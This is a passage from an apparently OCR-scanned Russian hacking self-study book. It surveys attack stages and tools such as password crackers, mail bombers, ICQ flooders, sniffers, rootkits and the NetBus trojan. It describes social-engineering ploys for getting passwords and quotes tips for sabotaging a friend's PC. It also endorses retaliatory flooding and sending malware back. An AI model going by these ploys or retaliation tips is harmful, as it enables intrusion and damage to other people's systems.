Самоучитель хакера
суперсекретный прибор до составления расписания на пригородную электричку,
от хранения банковских счетов до составления бухгалтерских отчетов. А для
передачи всей этой, подчас, совершенно секретной, информации используются
компьютерные сети, пришедшие на замену дискетам, жестким дискам и прочим
носителям данных, активно применяемых на первых этапах всеобщей компьютеризации. Таким образом, вся та информация, которая ранее пересылалась в
бумажных конвертах по почте, теперь передается в виде электрических сигналов
по проводам компьютерной сети, или пучков света по оптоволоконным кабелям,
или электромагнитного излучения в беспроводной сети, ну и так далее — сетевые
технологи не стоят на месте.
Итогом всех этих революционных преобразований стал тот неоспоримый факт,
что все сражения великой битвы за информационные ресурсы были немедленно
перенесены на виртуальные просторы киберпространства. Теперь вместо обшаривания пыльных шкафов в поисках нужной бумаги с чертежами секретного
прибора или финансового отчета компании, эти самые «претенденты» на обладание засекреченной информацией занялись взломом систем защиты компьютерных систем. Вместо набора отмычек, фонарика и веревочной лестницы, используемых для проникновения в канцелярские помещения, заставленные неуклюжими шкафами и сейфами, современные взломщики, сидя за компьютерами,
пытаются подсоединиться к секретной базе данных на сервере корпоративной
сети, находясь от нее на расстоянии в тысячи километров. Вместо установки
жучков в телефоны руководства корпорации они, сидя в подвале, подсоединяются к проводам локальной сети организации и перехватывают всю передаваемую по сети информацию, надеясь получить файл с секретными данными или
пароли доступа к закрытому сетевому ресурсу. Технические средства изменились, но суть осталась прежней — как и в реальном мире, в киберпространстве
ведется отчаянная борьба за обладание информацией, причем не на жизнь, а на
смерть, с применением любых методов и приемов.
Однако информационная революция конца 20-го века привнесла в эту схватку и
нечто новое — хакинг.

Что это такое г хакииг?
ЕСЛИ раньше великая битва за информацию, в том числе с применением компьютеров, велась профессионалами, преследующими какие угодно, но, в любом
случае, рациональные цели — например, шпионаж — то массовое вторжение в
нашу жизнь компьютеров вовлекло в это сражение целую ораву самой разношерстной публики, которая, не имея никакого понятия о булевой алгебре и
принципах работы сумматора центрального процессора ЭВМ (все, все — больше
не буду) получила доступ к весьма мощному и эффективному вычислительному
устройству, работа с которым ранее считалась уделом яйцеголовых интеллек-

10

Хакинг
туалов. Именно в этой среде возникли первые хакеры и зародилось такое интересное направление компьютерной деятельности, как хакинг — получение доступа к закрытой информации с целями, которые можно назвать до некоторой степени иррациональными.
Действительно, почитайте выпуски журнала «Хакер», и вы удивитесь многообразию вариантов использования компьютеров новоявленными бойцами информационных сражений. Вот пример «приложения» сил некоторых из участников
великой компьютерной битвы (пример из журнала «Хакер»).
Если твой друг ламер, то над его машиной можно произвести следующие действия:
• Поменять ВСЕ кнопки на клавиатурах (произвольно, см. раздел фишки).
• Раскрутить корпус мыши, вытащить шарик, отсоединить провод от
микросхемы, свинтить корпус обратно.
• Разбить Hard DISK [используя прогу Маздая Fdisk.exe] на n-ое количество логических дисков (сколько хард позволит, желательно побольше) и свалить все на вирус.
• Заклеить кулер СКОТЧЕМ покрепче! А после, используя суперклей,
приклеить его к процу навсегда!
• Начать форматирование и во время процесса [ 24% ] выключить
комп из сети, используя кнопочку POWER — его харду хана!
• Позагибать зубцы IDE-контроллеров на мамке.
Часть «советов» была отброшена, как устаревшая. Надеюсь, также, что вы догадались, что ламер — это нечто вроде «слабака», личности жалкой и убогой, недостойной работы на компьютере, кулер — это вентилятор, HARD DISK или
хард — это жесткий диск, прога — это программа, проц — процессор, а мамка это материнская плата. Самым интересным словом в этом «опусе» является
Маздай, что является исковерканной фразой на английском языке «Must die», в
вольном переводе означающей «Чтоб он сдох». В хакерской терминологии
Маздаем называется операционная система Windows, которая как раз и должна
умереть, по мнению автора этих «советов».
Слово Маздай для нас интересно в том смысле, что оно хорошо иллюстрирует
направленность мыслей личностей, занимающихся такого рода проделками.
В самом деле, зачем Windows должна умереть? Ну, запортилась операционная
система или сломался жесткий диск, тебе-то что с того? Можно только предположить, что в новейшую историю на великую битву за информационные ресурсы были рекрутированы, в том числе, личности весьма специфического склада,
которые в былые годы морально удовлетворялись стрельбой из рогатки по прохожим или истязаниями кошек в подвале.

11

Самоучитель хакера
И в самом деле, кто же занимается такими шалостями? Вот портрет одного из
столпов этой новой волны в молодежной культуре 21 века (журнал «Хакер»).
Имя: Доктор Добрянский
Особые приметы:
Лысый обугленный череп с клочками растительности и обрывками
проводов, черные глаза без белков, длинное худое гибкое тело,
хаотичная походка, пронзительный взгляд, неожиданные и резкие
броски на прохожих. Был одет в рваный радиоактивный халат, непонятный головной убор и кеды «Скороход».
История:
За изобретение и распространение смертоносных девайсов сослан
в сибирскую тайгу строгать матрешки из цельных кедров, но за хорошее поведение переведен на Заполярную АЭС в зону реактора.
В результате несчастного случая отдельные микросхемы Доктора
закоротило. Выдрав с корнем главный рубильник станции, совершил побег, попутно искусав охрану АЭС, трех белых медведей и
одного моржа.
Деятельность:
Тяжелые электротехнические мутации. Вскрывает различные кнопки и подключает к ним не известные науке устройства. Обещает
множественные оргазмы особям, нажавшим на эти кнопки. Подсоединяет к дверям миниатюрные нестабильные реакторы. Начиняет
мусоропроводы, тоннели и лифты высоковольтными фидерами,
рубильниками и переключателями. Хочет подсоединить всех и вся к
родной АЭС.
Хобби: модификация женского мозга посредством микропрограмм,
распространяемых по электронной почте.
Впечатляет, не правда ли? Однако возникает вопрос — а при чем здесь всемирная
война за обладание ценной информации, всякие хлопоты по поиску информации, взлому систем защиты компьютерных систем и прочие не такие уж и простые вещи? Неужели хакинг состоит в заклеивании «кулера» скотчем и в прочих
увлекательных проделках, про которые можно почитать во многих выпусках
журнала «Хакер»?
А при том, что все это — не более чем миф.
Прежде чем сделать выводы относительно феномена хакинга, следует обратиться к серьезным исследованиям по этой теме, проводимой, как следовало ожидать, разными правительственными спецструктурами, озабоченными… ну и так
далее. И вот, исследовав ту часть населения США, которая устойчиво посвящает
себя всякого рода штучкам в киберпространстве, ФБР (надеюсь, вы знаете, что
это такое) составило среднестатистический портрет хакера. Оказалось, что:
12

Хакинг
• Средний хакер — это молодой человек, возраста примерно от 16 до 19 лет.
• Большая часть (до 80%) этих молодых людей относятся к той части человеческих типов, которых называют английским словом «nerd». Это словечко
имеет два значения: 1) тормоз, зануда; 2) человек со всепоглощающим
стремлением к учебе и научной деятельности. (Интересно, не правда ли?
Все это как-то не вяжется с обликом доктора Добрянского).
• Средний хакер досконально знает операционные системы Windows и Unix,
глубоко освоил стеки протоколов TCP/IP и программирование на нескольких
языках, например, C++, Perl, Basic.
Никак не претендуя на полноту и окончательность выводов, попытаемся подытожить все эти исследования следующим образом. Возникший совсем недавно виртуальный мир — это все еще плохо освоенная территория, что-то вроде дикого запада Америки 19-го века. И каждому путешественнику по киберпространству,
особенно по молодости, хочется попробовать свои силы на просторах этой дикой
прерии, вторгаясь на территории, занятые чужими племенами и поселениями.
Если на входе в эту территорию стоит шлагбаум с табличкой «Проход закрыт», то
люди, перешагнувшие через шлагбаум, становятся на тернистый путь хакера.
Особое место занимают люди, перешагивающие через шлагбаумы по роду службы, но они-то, как раз, хакерами себя и не называют.
Все зависит от вашего отношения к шлагбаумам, к людям, которые их устанавливают, а также с какой стороны шлагбаума вы живете. В зависимости от этого обитатели виртуального мира разделились на две категории — на хакеров и всех прочих, назовем их, для симметрии, «антихакерами». Вы сами должны определиться,
с кем вам по пути. Чтобы помочь вам определиться, в книге сделана попытка простого и доступного описания основных приемов и методов, к которым прибегают
обе стороны — как хакеры, так и антихакеры — при выяснении отношений.
Стоит сделать некоторые уточнения. Под хакерами мы будем впредь понимать
профессионалов, способных проникать сквозь все заграждения, которые устанавливаются на подступах к заветному информационному ресурсу, а эти заграждения весьма серьезная вещь. Антихакерами же мы будем называть профессионалов, способных противостоять этим попыткам хакерского проникновения к закрытому информационному ресурсу. И борьба между хакерами и антихакерами ведется ни на
жизнь, а на смерть, с применением любых средств и тактических приемов.

Как хакеры все это делают
Итак, хакеру требуется получить доступ к желанному компьютерному ресурсу,
т.е. пробраться на чужую, хорошо огороженную территорию. Следует сразу
отметить, что реальные хакерские атаки отличаются от описанной выше заманчивой картинки настолько, насколько реальные боевые столкновения отличаются от их голливудских интерпретаций. Все дело в том, что нынче потен-

13

Самоучитель хакера
циальные жертвы тоже не сидят без дела, и готовы разобраться с нежеланными
гостями по полной программе, так что хакерам приходится прилагать множество усилий и проявлять большую изворотливость, чтобы решить свои задачи.
В полном соответствии с методами взломщиков, орудующих в реальном мире,
которые тщательно планируют нападение на банки и прочие места, где водятся
денежки, настоящие хакеры также разрабатывают сценарии вторжения и готовят
инструменты для доступа к лакомым ресурсам. Эти сценарии могут быть самыми различными, но все они выполняются в три этапа, полностью соответствующие действиям взломщиков в реальном мире: сбор информации — вторжение заметание следов.

информации
С помощью различных источников хакеры ищут информацию, необходимую
для проникновения на чужую территорию. Например, они могут использовать
Интернет, обратившись к сайту организации, в сеть которой они хотят вторгнуться, или рекламные буклеты этой организации, в которых можно найти номера телефонов корпорации, имена сотрудников и адреса их электронной почты
и так далее [3]. Далее хакеры выполняют сканирование сети организации для
выявления ее структуры, инвентаризации общих ресурсов, используемых операционных систем, запущенных программ и систем защиты. Для этого существуют целые наборы программных инструментов, работу с которыми мы будем
описывать на протяжении всей книги.

«Эиоржеиие
Собрав нужную информацию, в состав которой входит структура атакуемой информационной системы, адреса серверов локальной сети организации, используемые операционные системы и средства защиты, хакер приступает к вторжению. Излюбленный средствами массовой информации и Голливудом сюжет
опусов на тему хакинга — взлом через Интернет компьютерной системы на другом конце земного шара — это отнюдь не единственный метод доступа к закрытой информации, хотя и самый эффектный и привлекательный для зрителя. Если
хакер — это настоящий, решительно настроенный охотник за закрытой информацией, для достижения цели он использует тот метод, который наиболее эффективен для решения задачи. Все зависит от обстоятельств, и если у хакера есть
возможность физического доступа к компьютеру, он им воспользуется, поскольку наиболее мощные средства взлома системы защиты предполагают локальный
доступ к компьютерной системе.

14

Хакинг

Сокрытие следов
Каждый злоумышленник перед тем, как покинуть место преступления, заметает
следы, уничтожая отпечатки пальцев и другие следы, которые могут помочь его
идентификации. Так же и хакер должен уничтожить все следы своего вторжения, по которым его могут найти. Никогда не следует забывать, что в любой мало-мальски защищенной системе функционируют средства аудита, регистрирующие все подозрительные действия пользователя. Другая задача заметания следов сокрытие файлов, помещенных хакером в систему, и процессов, запущенных для
слежения за работой легитимных пользователей.
Для очистки следов пребывания существует множество методов, включающих
очистку журналов аудита, сокрытие запущенных программ и процессов помещением их в ядро операционной системы (т.е. той ее части, которая невидима
для пользовательского интерфейса). Скажем, взамен подлинных процедур ядра
операционной системы, хакер может запустить подмененные процедуры, которые будут оповещать его обо всех введенных пользователями паролях входной
регистрации, и выполнять другие действия, например, пересылку хакеру раскрытых паролей по Интернету. Такие задачи выполняются с помощью целых
комплектов программ, которые в просторечии называются наборами отмычек,
или, на сленге, «руткитами» (от английского слова rootkit — корневой комплект
инструментов). «Руткиты» — весьма популярное средство хакинга систем UNIX,
но и Windows 2000 не обойдена вниманием, и в Главе 4, посвященной целиком
вопросам сокрытия следов хакинга, мы еще обсудим эту тему, хотя, надо сказать, настоящий «руткит» для Windows, по видимому, еще на стадии создания.
Другой аспект задачи сокрытия следов связан с Интернетом. При попытках хакинга через Интернет хакер должен скрыть свой IP-адрес, который очень легко
фиксируется системами обнаружения вторжений и далее позволяет выловить
хакера прямо на рабочем месте. И тут мы сталкиваемся с совпадением задач хакинга и антихакинга — задача сохранения своей конфиденциальности актуальна
для обеих сторон. Для решения таких задач существует множество методов, самый лучший из которых — отказ от использования для хакинга компьютеров,
способных выдать ваше местонахождение, подключение через прокси-серверы,
использование специальных программ — брандмауэров, ограничивающих передачу конфиденциальной информации от компьютера пользователя Интернета на
сервер. Мы рассмотрим эти задачи по мере изложения методов хакинга во всех
главах этой книги, а отдельно этой теме посвящена Глава 4 — и автор
НАСТОЯТЕЛЬНО СОВЕТУЕТ ВСЕМ ПРОЧИТАТЬ ЭТУ ГЛАВУ САМЫМ
ВНИМАТЕЛЬНЫМ ОБРАЗОМ, прежде чем применять на деле все те штучки,
которые описаны в этой книге.

15

Самоучитель хакера

Инструменты Хзкинтв
На всех этапах сражений в киберпространстве хакеры и антйхакеры применяют
виртуальное оружие — специальные программные инструменты, для каждого
конкретного сценария атаки — свои. Все это соответствует реальной жизни — в
самом деле, отправляясь на разбой незачем брать с собой отмычки, а для взлома
сейфа не требуется парабеллум. С другой стороны, чтобы защититься от атаки
DoS вовсе не обязательно шифровать все свои файлы, а для защиты от хищения
номеров кредитных карточек вовсе не обязательно устанавливать систему IDS.
В этой главе мы перечислим все описываемые в книге инструменты хакинга
вместе с кратким описанием их функций. Это позволит вам быстро сориентироваться в содержимом книги и не тратить время на изучение тех средств, которые вы не собираетесь применять на практике.

Социальная инженерия
Говоря понятнее, социальная инженерия — это мошенничество, которое представляет собой универсальный и всемогущий инструмент, применяемый практически при всех сценариях вторжения. К социальной инженерии относится
рассылка электронной почты с вирусами и Троянами, телефонные звонки в атакуемую организацию с целью выведать полезную для вторжения информацию,
переговоры в чатах с целью выведать нужные хакеру данные и многое другое.
В начале главы мы привели пример письма, с помощью которого разного рода
личности «напаривают лохов» с целью халявного доступа к Интернету. Другие
примеры писем подобного рода можно найти в журналах «Хакер»; их содержание меняется в зависимости от наклонностей авторов, но есть и нечто общее.
Суть этих писем одна — заставить «ламера» раскрыться и выдать конфиденциальную информацию или выполнить действия, разрушающие систему защиты
компьютера, к примеру, запустить прикрепленное к письму вложение с хакерской программой, скажем, троянского коня.
Что удивительно, так это простота, с помощью которой можно обойти все препятствия системы защиты, воспользовавшись доверчивостью сотрудников атакуемой фирмы. Например, в [3] приводится пример взлома почтового ящика сотрудника фирмы, выполненный с помощью звонка в справочный отдел организации. Выдав себя за директора информационного отдела, «забывшего» свой
пароль, позвонивший в справочный отдел один из авторов книги [3] тут же получил пароль прямо по телефону!
Еще более интересный метод взлома почтового ящика предлагается в [1]. Общаясь в чатах, хакер выведывает адрес почтового ящика своей жертвы (якобы для
последующего общения). Далее хакер пытается открыть этот ящик и, не зная

16

Хакинг
пароля, прибегает к услуге, часто предоставляемой почтовыми серверами забывчивым клиентам — предоставлению пароля при ответе на контрольный вопрос. Как правило, список этих вопросов невелик, и включает такие пункты, как
«Любимое блюдо», «Имя вашей собачки», «Девичья фамилия матери» и тому
подобное. Допустим, при попытке взлома почтового ящика будет задан вопрос
«Любимое блюдо». Все, что теперь нужно сделать хакеру — это, общаясь в чате,
выведать у своей жертвы гастрономические пристрастия.
По мере изложения материала мы будем постоянно обращаться к теме социальной инженерии, поскольку эта тема неисчерпаема. Всем, кто захочет еще больше углубить свои познания в этой области, рекомендуем обратиться к выпускам
журнала «Хакер», все время преподносящего новинки в деятельности такого
рода. Главное условие для их применения — наличие определенных специфических наклонностей и некоторые познания в человеческой психологии.

Предварительный с£ор информации
В приведенном выше примере хакинга почтового ящика имя и фамилию директора информационного отдела взломщики узнали из регистрационной информации доменных имен Интернета. Эту информацию без ограничений предоставляют многие Web-сайты Интернета (например, сайт компании RIPE NCC по адресу http://www.ripe.net). Такие Web-сайты, содержащие базы данных Whols,
весьма полезны для выполнения хакерских атак, тем более, что они не требуют
никаких расходов и специальных программных инструментов.
Другую, не менее обширную информацию о взламываемой системе можно получить из Интернета с помощью различных поисковых систем, например, предоставляемых различными Web-сайтами. К их числу относится Yahoo
(http://www.yahoo.com), или русскоязычный сайт Rambler (http://www.rambler.ru).
Применение этих сайтов весьма разнообразно. Например, просматривая разделы, посвященные финансовым организациям, хакеры ищут компании, находящиеся в процессе реорганизации. Как правило, в таких компаниях царит беспорядок, системы защиты ослабевают, и у хакера появляется шанс запустить коготок в нужный ему информационный ресурс [3].
Очень полезные для хакера сведения предоставляет поисковая система Google
(http://www.google.com), позволяющая найти в Интернете серверы с определенной структурой каталогов. Например, выполнив поиск серверов, содержащих каталог C:\WINNT, можно выявить серверы с операционной системой W i n dows NT/2000. Тем самым будет решена одна из задач инвентаризации компьютерной системы — определение операционной системы, что весьма важно для
выбора стратегии хакинга системы.

17

Самоучитель хакера
Более эффективный поиск нужной информации в Интернете хакер может выполнить с помощью специальных программ, например, утилиты Teleport Pro.
Эта утилита позволяет выполнять поиск в Интернете интересующей хакера информации по указанному ключевому слову, загружать отдельные Web-сайты на
жесткий диск, и исследовать их с целью выявления полезной информации.
Например, хакеры ищут информацию, оставленную в коде HTML Web-страниц
по недосмотру или по неосторожности — телефоны, адреса электронной почты
сотрудников, структуру каталогов сервера HTTP и так далее. Все это весьма
ценное приобретение, поскольку, зная, скажем, телефонный номер организации,
хакер может прозвонить целый диапазон телефонных номеров, близких к найденному номеру, и найти телефонную линию с модемом, подключенным к сетевому компьютеру организации (все это описано в Главе 1 1 книги).
Ну и наконец, очень много ценной информации можно найти в рекламных буклетах и содержимом Web-сайтов организаций — телефоны, адреса электронной
почты сотрудников, их имена. Все эти сведения могут оказаться ниточкой, которая приведет хакера к бреши в системе защиты компьютерной системы.

паролей доступа к файлам
Информационные ресурсы, которые хакер может извлечь из атакуемой системы,
хранятся в файлах документов и базах данных, и именно к ним хакеры пытаются
получить доступ. Решение этой задачи распадается на два этапа.
Во-первых, войдя в систему, хакер должен выполнить то, что называется расширением привилегий, т.е. попытаться получить права пользователя системы с как
можно более широкими правами доступа к ресурсам системы, лучше всего, администратора. Один из путей решения этой задачи — взлом базы данных SAM
(Security Account Manager — Диспетчер учетных записей системы защиты), хранящей пароли доступа к операционной системе в зашифрованном виде. Взлом
базы SAM — весьма заманчивая для хакера цель, и методы ее достижения мы
описываем в Главе 3 этой книги на примере знаменитой программы, ставшей
классикой взлома, LOphtCrack версии LC4 (http://www.atstake.com).
Во-вторых, хакер должен взломать защиту файлов с интересующими его данными, например, почтовый ящик с текущей перепиской, кошелек Windows с номерами кредитных карточек, документы MS Office и так далее. Если файлы данных зашифрованы, то перед хакером встает задача взлома пароля доступа.
Для решения такой задачи существует множество программ, обсуждаемых в
Главе 3 этой книги. Мы описываем целый пакет программ Office Password 3.5
(http://lastbit.com/download.asp) для взлома множества информационных ресурсов Windows — электронной почты, кошельков, архивов и других.
Другие задачи решает программа Revelation от компании SnadBoy
(http://www.snadboy.com). Эта программа позволяет определить пароли, скры18

Хакинг
тые за строкой «*****» в поле ввода пароля — к сожалению, новые приложения
уже не допускают такого простого взлома своих паролей, но кое-какую помощь
программа Revelation оказать в состоянии.
Вообще, задачи взлома доступа к шифрованной информации составляют целую
научную дисциплину, называемую криптоанализом, которая, в свою очередь,
является целым разделом отрасли знаний, называемой криптографией. Для задач
хакинга криптография представляет весьма большую важность.
Антихакеру инструменты взлома паролей также могут пригодиться — кто из нас
не терял пароли доступа к шифрованным файлам или провайдеру Интернета?
Вдобавок, знание возможностей хакерских программ сильно помогает при настройке системы защиты, поскольку заставляет более ответственно подходить к
задаче выбора паролей — вы поймете, что короткий простой пароль — это зияющая дыра в системе защиты.

Агпзкз клиентов Welo
Беспечные путешественники по виртуальным просторам Интернета — это любимая пожива для хакеров. Мало кто задумывается, открывая очередной Web-сайт,
какие цели преследовали создатели сайта, а ведь они вполне способны изрядно
потрепать нервы и опустошить кошелек доверчивого клиента очередного
«бесплатного» сервиса или Интернет-магазина.
Хакер может, пользуясь некоторыми недостатками системы защиты Webбраузеров, сконструировать такую Web-страничку, что браузер доверчивого
Web-путешественника превратится в оружие хакера, размещая и запуская без
ведома хозяина в памяти компьютера враждебные программы. Способы конструирования таких Web-страничек описаны в Главе 5 этой книги.
Другой популярной забавой хакеров можно назвать использование электронной
почты, которая ныне все больше превращается в самый настоящий рассадник
вирусов. В самом деле, открывая ленты новостей различных Web-сайтов, то и
дело сталкиваешься с предупреждениями и страшными историями о только что
появившемся вирусе.
Спамминг также можно отнести к распространенному явлению нынешнего киберпространства. В распоряжении хакера находятся «мейлбомберы», забрасывающие почтовый ящик жертвы разным мусором, и в Главе 6 описана программа с устрашающим названием Death & Destruction Email Bomber — Смертельный
и Всесокрушающий мейлбомбер. Цели таких акций могут быть самыми разнообразными, в том числе самыми злонамеренными. Еще интереснее для хакера залезть в почтовый ящик своего ближнего, а это можно сделать с помощью программы взлома доступа к почтовому серверу, например, описываемой в Главе 6
популярной утилиты Brutus.
19

Самоучитель хакера
Вниманием хакеров не обойдены и другие службы Интернета, например, ICQ. Что
может быть забавнее — выявить IP-адрес своего ICQ-собеседника и с помощью
программы так называемого «флудера» (от английского слова flood — заливать)
послать ICQ-собеседнику целую лавину пакетов, подвешивающих его компьютер! Для этого существует множество программ — например, обсуждаемая в Главе 7 программа ICQ Flooder, входящая в пакет программ ICQ-MultiVar, содержащего целый комплект весьма полезных инструментов для подобного рода проделок в киберпространстве.
Эти инструменты одинаково пригодны и хакеру и антихакеру — например, отслеживая IP-адрес и поведение ICQ-собеседника и имея под рукой флудер ICQ,
можно достичь гораздо большего взаимопонимания обоих сторон, особенно если дать своему собеседнику возможность узнать о наличии у вас таких средств.
Следует только не увлекаться и не стремиться к большему эффекту, чем это необходимо для обороны.

Агпзкз серверов Web
Web-серверы весьма привлекательны для хакера, поскольку эти серверы открыты для атак из Интернета, включая такие опасные атаки, как вторжение в корпоративную сеть и атаки DoS, выводящие из строя Интернет-сервисы сайта.
Недостатки же защиты серверов Интернета, включая сервер IIS 5 (Internet Information Server — Информационный сервер Интернета) компании Microsoft делают
шансы на успех таких атак достаточно реальными.
Для атаки Web-серверов хакер может использовать многочисленные инструменты, которые позволяют сканировать уязвимые сценарии на Web-серверах, отыскивать в коде HTML полезные для взлома системы сведения и выполнять другие действия. В Главе 8 описаны некоторые популярные инструменты этого рода, в частности, программа CGIScan поиска уязвимых сценариев и программа
Brutus, позволяющая взломать защиту серверов IIS методом простого перебора
всех паролей доступа. В Главе 9 мы описываем инструменты, применяемые для
наиболее популярных атак DoS.
Для антихакера инструменты атаки Web-серверов также представляют интерес,
поскольку позволяют выполнять ответные действия против хакеров, мешающих
нормальной работе Web-сервера. Например, распределенную атаку DoS можно
пресечь, посылая на компьютеры-зомби пакеты, препятствующие их работе.
Антихакеру следует также знать возможности инструментов хакинга Webсерверов и, например, избегать применения уязвимых CGI-сценариев. Далее, для
проверки своих сайтов на уязвимость антихакеру очень полезно прибегнуть к
инструментам, применяемым хакерами при сканировании уязвимостей сайтов.

20

Хакинг

Сетевые сканеры
Для взлома доступа к компьютерам сети TCP/IP хакеру, прежде всего, следует
изучить ее структуру, определив подсоединенные к сети компьютеры, их локальные IP-адреса, выявить открытые порты компьютеров и функционирующие
на них операционные системы, службы и приложения. Для этого и существуют
программы сетевых сканеров, функции которых подобны инструментальным
средствам анализа функционирования компьютерной сети.
В Главе 10 мы описываем одну из наиболее популярных хакерских утилит сканирования сети — программу SuperScan, входящую в набор программ foundstone_tools
(http://www.foundstone.com). Также не обойден вниманием пакет программ
W2RK (Windows 2000 Resource Kit — Комплект инструментов администратора
Windows 2000), который настолько полюбился хакерам, что стал называться
комплектом W2HK (Windows 2000 Hacker Tools — Комплект инструментов хакера Windows 2000).
Антихакеру средства сканирования сети полезны в том смысле, что позволяют
выяснить ее уязвимость, не дожидаясь, пока это сделает хакер.

flepex&am сетевого трафика
Программы перехвата сетевого трафика позволяют хакерам вытворять очень
многие штучки, подсоединившись к сетевой кабельной системе с помощью специальных приспособлений, либо просто запустив хакерскую утилиту на легальном сетевом компьютере. Учитывая хаос, который чаще всего царит в локальных сетях организаций с множеством никем не контролируемых компьютеров,
пользователи которых имеют права на установку и запуск каких-угодно служб и
программ, последний вариант действий хакера представляется оптимальным.
Дополнительные возможности предоставляет наличие беспроводных сетей, обмен информацией в которых выполняется по радиоканалам. В таком случае достаточно за стенкой поставить свой компьютер с радиомодемом, чтобы получить
полный доступ к информации, циркулирующей в сети.
Простейшей атакой перехвата данных является снифинг — прослушивание передаваемой по сети информации. В состав этой информации входят пароли доступа к общесетевым ресурсам, сообщения электронной почты, циркулирующие
как внутри сети, так и пересылаемые внешним адресатам, передаваемые по сети
информационные файлы и прочие весьма лакомые для хакера данные. Одна из
наиболее популярных сниферов — программа SpyNet, которая позволяет выполнять весь набор

описанных выше процедур и имеет весьма удобный графический интерфейс.

21

Самоучитель хакера
Антихакер, зная о таких методах хакинга, может предпринять свои меры защиты шифровать передаваемые данные с помощью технологии VPN (Virtual Private
Network — Виртуальные частные сети) или использовать программы, называемые антисниферами, которые выявляют хакерские компьютеры-перехватчики
сетевых данных. Более того, сниферы, как и сетевые сканеры, представляют собой мощные инструменты анализа функционирования сети, и их возможности
по поиску вторжения неисчерпаемы, чем и должен пользоваться любой квалифицированный антихакер.

Устроенные средства операционной системы
Мы уже говорили, как хакеры переименовали пакет утилит W2RK (инструменты
обслуживания Windows 2000) в пакет W2HK — инструменты хакинга Windows 2000,
поскольку утилиты из этого пакета прекрасно подходят для исследования атакуемой системы. В операционной системе Windows имеется и другое средство Проводник (Explorer) Windows, весьма удобный для исследования информационных ресурсов хакнутой системы. Скажем, хакер может прибегнуть к поиску
файлов по определенному ключевому слову, например, password, или пароль.
Как указано в [3], просто удивительно, насколько распространена порочная
практика хранения паролей доступа к закрытым информационным ресурсам,
типа номеров кредитных карточек, в незащищенных текстовых файлах. Так что
взломавший компьютерную систему хакер сможет без труда получить доступ и
к другим интересным ресурсам, найдя, допустим, файл с названием
password.txt или файл, содержащий строку пароль к провайдеру ISP.
Антихакер должен уметь прятать ценные данные от таких инструментов хакинга делать файлы невидимыми, сохранять в шифрованных дисках, присваивать нейтральные имена и так далее. Неплохо также научиться применять средства шифрования, встроенные в файловую систему NTFS компьютеров Windows 2000/XP,
или предоставляемые другими криптографическими приложениями, например,
PGP Desktop Security.

11рограммы~эксплойты
Эксплойты — это программы, которые используют уязвимости для вторжения
в компьютер, т.е. наиболее важные для хакера инструменты. Мы уже упоминали про Web-сайты различных организаций, поддерживающих базы данных
уязвимостей и эксплойтов компьютерных систем (см., например, сайт
http://www.securitylab.ru). В Главе 8 мы опишем технологию применения эксплойтов на примере хакинга сервера IIS. Найдя с помощью сканера CGIScan
уязвимый сценарий, хакер может обратиться к базе данных уязвимостей и эксплойтов и попытаться взломать доступ к серверу. К сожалению, нынче в Интер22

Хакинг
нете очень трудно найти настоящий исполняемый файл эксплойта для современных приложений — в отличие от предыдущего поколения программ, например, для серверов IIS 4. В лучшем случае эксплойты в Web представлены в виде
исходных программных кодов, с которыми еще нужно долго разбираться. Так
что эксплойты — это отнюдь не ключик, открывающий двери к искомому ресурсу, а скорее заготовка для этого ключика. Так что все в ваших руках.
Для антихакера обязательно знание всех уязвимостей и эксплойтов, угрожающих его системе; более того, эти сведения должны непрерывно обновляться, поскольку «безопасность — это процесс» (Брюс Шнайер). То, что надежно защищает вас сегодня, завтра будет непригодно — кто-нибудь, да найдет маленькую
дырочку в системе защиты, а уж расширить ее — это дело техники.

и трояны
Вирусы — это тоже инструменты атаки, которые позволяют внедрить в систему соглядатая или просто злонамеренную программу. Особую опасность представляют
троянские кони — программы, которые внедряются в систему и позволяют хакеру
удаленно управлять хакнутым компьютером. В Главе 10 мы опишем возможности
старого и заслуженного троянского коня NetBUS, который делает взломанный компьютер практически рабом хакера. А установка троянов на атакуемом компьютере не такое уж и сложное дело, как это может показаться. Для этого следует только
разослать письма с вложением — программой троянского коня и дождаться, пока
очередной «ламер» щелкнет на ссылке с заманчивым предложением, скажем, обновить с помощью присланного вложения свой браузер Интернета.
Для борьбы с такими инструментами хакинга существуют антивирусы и специализированные программы удаления троянов. Для антихакера трояны также могут пригодиться — скажем, получив от хакера письмецо с вирусной начинкой,
выявите его злонамеренное содержимое антивирусом и отошлите начинку обратно авторам вместе с благодарностью за заботу. Или, например, вдруг кто-то
украдет ваш компьютер — и тогда, быть может, хитро запрятанный троянский
конь может облегчить поиски вора… Помните однако, что распространение вирусов карается по закону, и автор ни в коем случае не одобряет таких действий.

Заключение
В этой главе мы попытались облегчить читателям работу с книгой — по крайней
мере, теперь вам стала ясна ее структура, и понятно, что следует прочитать, чтобы
научиться выполнять определенную атаку. И в самом деле, зачем знакомиться с
сетевыми атаками, если можно залезть через форточку в комнату с компьютером
(автор не советует), извлечь жесткий диск, быстро убежать и познакомиться с ним
в спокойной обстановке? Или, к примеру, стоит ли пытаться залезть через Интер-

23

Самоучитель хакера
нет на сервер организации, политика безопасности которой сводится к листочкам
со списками паролей, приклеенным скотчем к мониторам компьютеров?
В самом деле, почитайте содержимое хакерских сайтов Интернета — и что же?
Оказывается, можно просто залезть в мусорный ящик организации, использующей компьютерные технологии (а кто их не использует), чтобы добыть целый
мешок дискет, документов, всяких бумажек, содержащих практически все — от
паролей доступа к компьютерной сети до самых конфиденциальных данных.
Но в этой книге мы ограничимся хакерскими технологиями, не связанными с
такими экзотическими методами.
Инструменты хакинга весьма разнообразны и выбор наиболее эффективных из
них зависит от опыта и возможностей хакера. Причем, если вас интересует
именно информация, а не всякие интересные штучки, свойственные личностям
наподобие доктора Добрянского, следует избирать наиболее оптимальную тактику вторжений. Антихакеру же следует уделить самое пристальное внимание
всем технологиям хакинга, чтобы не стать субъектом, которого «кул хацкеры»
в просторечии называют «ламером».
А теперь приступим к изучению самих инструментов хакинга, которые позволяют выполнять все эти удивительные вещи, про которые мы часто читаем в
прессе и видим на экранах телевизоров, иногда видим пользователей этих инструментов в сопровождении джентльменов в фуражках и комментариев на тему
«вот что бывает, если не слушаться старших…». Поэтому, чтобы избежать многих неприятностей в дальнейшем, начнем с изучения своего противника — системы защиты компьютеров Windows 2000/XP.

24

Г Л А В А 2.

Защита Windows «ЮО/Xf
Операционные системы семейства Windows 2000 с самого начала разрабатывались с учетом требований документа TCSEC (Trusted Computer System Evaluation
Criteria — Критерии оценки надежной системы) министерства обороны США.
Для обеспечения безопасности компьютерных систем, созданных на базе
Windows 2000, в нее включены средства защиты, поддерживающие три основных компонента.
• Аутентификация.
• Авторизация.

Аудит.

Рассмотрим эти компоненты системы защиты по очереди.

